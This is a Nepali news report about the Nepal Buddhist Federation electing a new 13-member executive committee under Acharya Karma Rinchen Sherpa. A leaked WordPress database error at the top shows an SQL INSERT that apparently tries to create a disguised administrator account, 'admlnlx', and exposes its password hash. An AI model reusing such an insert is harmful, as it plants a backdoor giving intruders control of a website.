WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BM87R237CzzQ.1TujedVbc1Ckx3bj/.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 16:30:08', '', 'admlnlx', 'admlnlx')
काठमाडौँ,पुस ८ –
नेपाल बौद्ध महासङ्घले आचार्य कर्मा रिन्छेन शेर्पाको अध्यक्षतामा १३ सदस्यीय नयाँ कार्यसमिति निर्वाचित गरेको छ ।
बिहीबार राति सम्पन्न महासङ्घको चौथो महाधिवेशनले उपाध्यक्षमा आचार्य नोर्वु शेर्पा, महासचिवमा कमल भण्डारी र कोषाध्यक्षमा करजम लामा निर्वाचित गरेको छ । महासङ्घमा प्रत्येक तीन वर्षमा महाधिवेशन तथा नयाँ नेतृत्व परिवर्तन हुँदै आएको छ ।
विशेषगरी ञिङमा, काग्यु, शाक्य र गेलुक चार महायान बौद्ध परम्पराका धर्म गुरु तथा अनुयायी सो महासङ्घमा आवद्ध हुनुहुन्छ । बौद्ध धर्म, दर्शन र संस्कृतिको राष्ट्रिय तथा अन्तर्राष्ट्रिय तहमा प्रवद्र्धन तथा मुलुकका विभिन्न ठाउँमा सामाजिक गतिविधि सञ्चालन महासङ्घले गर्दै आएको छ ।
मुलुकमा महायान सम्प्रदायअन्तर्गत भएका विभिन्न गुम्बा तथा सम्पदाको उचित संरक्षण एवम् संवद्र्धनका लागि महासङ्घले सरकारी तथा गैरसरकारी सङ्घ संस्थासँग सहकार्य तथा समन्वय गर्दै आएको छ ।
नवनिर्वाचित अध्यक्ष शेर्पाले बौद्ध धर्मावलम्बीका हकहित तथा अधिकारका लागि सक्रिय रही धर्मको माध्यमबाट समाजमा शान्ति स्थापना र राष्ट्र निर्माणमा लाग्ने प्रतिबद्धता व्यक्त गर्नुभयो । – रासस